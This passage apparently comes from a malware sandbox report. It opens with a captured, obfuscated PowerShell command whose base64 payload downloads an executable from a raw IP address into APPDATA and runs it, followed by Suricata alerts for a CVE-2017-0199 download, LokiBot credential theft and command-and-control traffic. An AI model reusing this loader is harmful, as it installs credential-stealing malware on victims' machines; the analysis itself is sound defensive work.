InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline", ProcessId: 1908, ProcessName: csc.exe

Suricata Signatures

ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T10:11:16.946091+0100	2024197	1	A Network Trojan was detected	66.63.187.231	80	192.168.2.22	49169	TCP

ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T10:11:16.946086+0100	2024449	1	Attempted User Privilege Gain	192.168.2.22	49169	66.63.187.231	80	TCP

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T10:11:25.038949+0100	2022050	1	A Network Trojan was detected	66.63.187.231	80	192.168.2.22	49170	TCP

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T10:11:25.324376+0100	2022051	1	A Network Trojan was detected	66.63.187.231	80	192.168.2.22	49170	TCP

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T10:11:34.825229+0100	2024312	1	A Network Trojan was detected	192.168.2.22	49171	94.156.177.41	80	TCP
2024-11-20T10:11:35.689000+0100	2024312	1	A Network Trojan was detected	192.168.2.22	49172	94.156.177.41	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T10:11:34.232361+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49171	94.156.177.41	80	TCP
2024-11-20T10:11:34.936986+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49172	94.156.177.41	80	TCP
2024-11-20T10:11:35.753276+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-20T10:11:36.788420+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49174	94.156.177.41	80	TCP
2024-11-20T10:11:37.865230+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-20T10:11:39.935431+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-20T10:11:40.804853+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-20T10:11:41.692875+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49178	94.156.177.41	80	TCP
2024-11-20T10:11:42.598311+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-20T10:11:43.508451+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-20T10:11:44.410226+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-20T10:11:46.066976+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-20T10:11:47.094306+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-20T10:11:48.001931+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49184	94.156.177.41	80	TCP
2024-11-20T10:11:48.916450+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-20T10:11:49.934221+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-20T10:11:50.825355+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-20T10:11:51.974265+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-20T10:11:52.833476+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-20T10:11:53.743942+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-20T10:11:54.665755+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-20T10:11:55.543705+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-20T10:11:56.465409+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-20T10:11:57.354850+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-20T10:11:58.251851+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-20T10:11:59.153133+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-20T10:12:00.062553+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-20T10:12:01.086240+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-20T10:12:02.135572+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-20T10:12:03.154171+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-20T10:12:04.183469+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-20T10:12:05.221730+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-20T10:12:06.101870+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-20T10:12:06.992362+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-20T10:12:07.878233+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-20T10:12:08.762365+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-20T10:12:09.636983+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-20T10:12:10.655009+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49208	94.156.177.41	80	TCP
2024-11-20T10:12:11.548573+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49209	94.156.177.41	80	TCP
2024-11-20T10:12:12.583479+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49210	94.156.177.41	80	TCP
2024-11-20T10:12:13.635352+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49211	94.156.177.41	80	TCP
2024-11-20T10:12:14.668490+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49212	94.156.177.41	80	TCP
2024-11-20T10:12:15.692786+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49213	94.156.177.41	80	TCP
2024-11-20T10:12:16.709953+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49214	94.156.177.41	80	TCP
2024-11-20T10:12:17.740346+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49215	94.156.177.41	80	TCP
2024-11-20T10:12:19.475029+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49216	94.156.177.41	80	TCP
2024-11-20T10:12:20.388739+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49217	94.156.177.41	80	TCP
2024-11-20T10:12:21.265845+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49218	94.156.177.41	80	TCP
2024-11-20T10:12:22.394589+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49219	94.156.177.41	80	TCP
2024-11-20T10:12:23.419939+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49220	94.156.177.41	80	TCP
2024-11-20T10:12:24.307414+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49221	94.156.177.41	80	TCP
2024-11-20T10:12:25.356968+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49222	94.156.177.41	80	TCP
2024-11-20T10:12:26.273860+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49223	94.156.177.41	80	TCP
2024-11-20T10:12:27.165072+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49224	94.156.177.41	80	TCP
2024-11-20T10:12:28.110543+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49225	94.156.177.41	80	TCP
2024-11-20T10:12:28.999728+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49226	94.156.177.41	80	TCP
2024-11-20T10:12:29.966426+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49227	94.156.177.41	80	TCP
2024-11-20T10:12:30.982470+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49228	94.156.177.41	80	TCP
2024-11-20T10:12:32.023731+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49229	94.156.177.41	80	TCP
2024-11-20T10:12:32.972572+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49230	94.156.177.41	80	TCP
2024-11-20T10:12:33.892076+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49231	94.156.177.41	80	TCP
2024-11-20T10:12:34.777104+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49232	94.156.177.41	80	TCP
2024-11-20T10:12:35.645216+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49233	94.156.177.41	80	TCP
2024-11-20T10:12:36.520686+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49234	94.156.177.41	80	TCP
2024-11-20T10:12:37.391332+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49235	94.156.177.41	80	TCP
2024-11-20T10:12:38.295670+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49236	94.156.177.41	80	TCP
2024-11-20T10:12:39.189869+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49237	94.156.177.41	80	TCP
2024-11-20T10:12:40.238221+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49238	94.156.177.41	80	TCP
2024-11-20T10:12:41.149834+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49239	94.156.177.41	80	TCP
2024-11-20T10:12:42.075089+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49240	94.156.177.41	80	TCP
2024-11-20T10:12:43.090775+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49241	94.156.177.41	80	TCP
2024-11-20T10:12:44.335023+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49242	94.156.177.41	80	TCP
2024-11-20T10:12:45.306056+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49243	94.156.177.41	80	TCP
2024-11-20T10:12:46.228751+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49244	94.156.177.41	80	TCP
2024-11-20T10:12:47.301018+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49245	94.156.177.41	80	TCP
2024-11-20T10:12:48.198489+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49246	94.156.177.41	80	TCP
2024-11-20T10:12:49.104815+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49247	94.156.177.41	80	TCP
2024-11-20T10:12:50.259999+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49248	94.156.177.41	80	TCP
2024-11-20T10:12:51.135098+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49249	94.156.177.41	80	TCP
2024-11-20T10:12:52.064243+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49250	94.156.177.41	80	TCP
2024-11-20T10:12:53.190103+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49251	94.156.177.41	80	TCP
2024-11-20T10:12:54.198386+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49252	94.156.177.41	80	TCP
2024-11-20T10:12:55.205372+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49253	94.156.177.41	80	TCP
2024-11-20T10:12:56.120814+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49254	94.156.177.41	80	TCP
2024-11-20T10:12:57.001731+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49255	94.156.177.41	80	TCP
2024-11-20T10:12:57.910682+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49256	94.156.177.41	80	TCP
2024-11-20T10:12:58.994068+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49257	94.156.177.41	80	TCP
2024-11-20T10:12:59.856695+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49258	94.156.177.41	80	TCP
2024-11-20T10:13:00.859620+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49259	94.156.177.41	80	TCP
2024-11-20T10:13:01.807106+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49260	94.156.177.41	80	TCP
2024-11-20T10:13:02.864990+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49261	94.156.177.41	80	TCP
2024-11-20T10:13:03.882271+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49262	94.156.177.41	80	TCP
2024-11-20T10:13:04.788703+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49263	94.156.177.41	80	TCP
2024-11-20T10:13:05.710359+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49264	94.156.177.41	80	TCP
2024-11-20T10:13:06.715979+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49265	94.156.177.41	80	TCP
2024-11-20T10:13:07.728341+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49266	94.156.177.41	80	TCP
2024-11-20T10:13:08.595686+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49267	94.156.177.41	80	TCP
2024-11-20T10:13:09.484579+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49268	94.156.177.41	80	TCP
2024-11-20T10:13:10.364041+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49269	94.156.177.41	80	TCP
2024-11-20T10:13:11.382963+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49270	94.156.177.41	80	TCP
2024-11-20T10:13:12.272453+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49271	94.156.177.41	80	TCP
2024-11-20T10:13:13.292586+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49272	94.156.177.41	80	TCP
2024-11-20T10:13:14.191871+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49273	94.156.177.41	80	TCP
2024-11-20T10:13:15.065941+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49274	94.156.177.41	80	TCP
2024-11-20T10:13:16.079240+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49275	94.156.177.41	80	TCP
2024-11-20T10:13:17.017320+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49276	94.156.177.41	80	TCP
2024-11-20T10:13:18.056702+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49277	94.156.177.41	80	TCP
2024-11-20T10:13:18.985728+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49278	94.156.177.41	80	TCP
2024-11-20T10:13:20.030600+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49279	94.156.177.41	80	TCP
2024-11-20T10:13:21.135705+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49280	94.156.177.41	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T10:11:36.644739+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49173	TCP
2024-11-20T10:11:37.690894+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49174	TCP
2024-11-20T10:11:38.721967+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49175	TCP
2024-11-20T10:11:40.665595+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49176	TCP
2024-11-20T10:11:41.549085+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49177	TCP
2024-11-20T10:11:42.442906+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49178	TCP
2024-11-20T10:11:43.362123+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49179	TCP
2024-11-20T10:11:44.258106+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49180	TCP
2024-11-20T10:11:45.158361+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49181	TCP
2024-11-20T10:11:46.817046+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49182	TCP
2024-11-20T10:11:47.859109+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49183	TCP
2024-11-20T10:11:48.768499+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49184	TCP
2024-11-20T10:11:49.786314+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49185	TCP
2024-11-20T10:11:50.669657+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49186	TCP
2024-11-20T10:11:51.578703+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49187	TCP
2024-11-20T10:11:52.682271+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49188	TCP
2024-11-20T10:11:53.605545+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49189	TCP
2024-11-20T10:11:54.512561+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49190	TCP
2024-11-20T10:11:55.402298+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49191	TCP
2024-11-20T10:11:56.311347+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49192	TCP
2024-11-20T10:11:57.204029+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49193	TCP
2024-11-20T10:11:58.107727+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49194	TCP
2024-11-20T10:11:58.995828+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49195	TCP
2024-11-20T10:11:59.914415+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49196	TCP
2024-11-20T10:12:00.924468+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49197	TCP
2024-11-20T10:12:01.969084+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49198	TCP
2024-11-20T10:12:03.007930+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49199	TCP
2024-11-20T10:12:04.035992+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49200	TCP
2024-11-20T10:12:05.070422+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49201	TCP
2024-11-20T10:12:05.963806+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49202	TCP
2024-11-20T10:12:06.854208+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49203	TCP
2024-11-20T10:12:07.741514+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49204	TCP
2024-11-20T10:12:08.615371+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49205	TCP
2024-11-20T10:12:09.492422+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49206	TCP
2024-11-20T10:12:10.494091+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49207	TCP
2024-11-20T10:12:11.411925+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49208	TCP
2024-11-20T10:12:12.427402+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49209	TCP
2024-11-20T10:12:13.489277+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49210	TCP
2024-11-20T10:12:14.386020+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49211	TCP
2024-11-20T10:12:15.548693+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49212	TCP
2024-11-20T10:12:16.548175+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49213	TCP
2024-11-20T10:12:17.581516+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49214	TCP
2024-11-20T10:12:18.607117+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49215	TCP
2024-11-20T10:12:20.254986+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49216	TCP
2024-11-20T10:12:21.124909+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49217	TCP
2024-11-20T10:12:22.175233+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49218	TCP
2024-11-20T10:12:23.277419+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49219	TCP
2024-11-20T10:12:24.155302+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49220	TCP
2024-11-20T10:12:25.204348+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49221	TCP
2024-11-20T10:12:26.125401+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49222	TCP
2024-11-20T10:12:27.026766+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49223	TCP
2024-11-20T10:12:27.977194+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49224	TCP
2024-11-20T10:12:28.862681+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49225	TCP
2024-11-20T10:12:29.833483+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49226	TCP
2024-11-20T10:12:30.836788+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49227	TCP
2024-11-20T10:12:31.866393+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49228	TCP
2024-11-20T10:12:32.804698+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49229	TCP
2024-11-20T10:12:33.734312+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49230	TCP
2024-11-20T10:12:34.652151+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49231	TCP
2024-11-20T10:12:35.510221+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49232	TCP
2024-11-20T10:12:36.382089+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49233	TCP
2024-11-20T10:12:37.254017+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49234	TCP
2024-11-20T10:12:38.156608+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49235	TCP
2024-11-20T10:12:39.040738+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49236	TCP
2024-11-20T10:12:40.087453+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49237	TCP
2024-11-20T10:12:41.006067+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49238	TCP
2024-11-20T10:12:41.933396+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49239	TCP
2024-11-20T10:12:42.947066+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49240	TCP
2024-11-20T10:12:43.965760+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49241	TCP
2024-11-20T10:12:45.167988+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49242	TCP
2024-11-20T10:12:46.066783+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49243	TCP
2024-11-20T10:12:46.968414+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49244	TCP
2024-11-20T10:12:48.042569+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49245	TCP
2024-11-20T10:12:48.948748+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49246	TCP
2024-11-20T10:12:50.039447+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49247	TCP
2024-11-20T10:12:51.002482+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49248	TCP
2024-11-20T10:12:51.895820+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49249	TCP
2024-11-20T10:12:52.945428+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49250	TCP
2024-11-20T10:12:54.059285+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49251	TCP
2024-11-20T10:12:55.073293+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49252	TCP
2024-11-20T10:12:55.961425+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49253	TCP
2024-11-20T10:12:56.849610+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49254	TCP
2024-11-20T10:12:57.768461+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49255	TCP
2024-11-20T10:12:58.804070+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49256	TCP
2024-11-20T10:12:59.724299+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49257	TCP
2024-11-20T10:13:00.720255+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49258	TCP
2024-11-20T10:13:01.618232+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49259	TCP
2024-11-20T10:13:02.706048+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49260	TCP
2024-11-20T10:13:03.734512+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49261	TCP
2024-11-20T10:13:04.655379+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49262	TCP
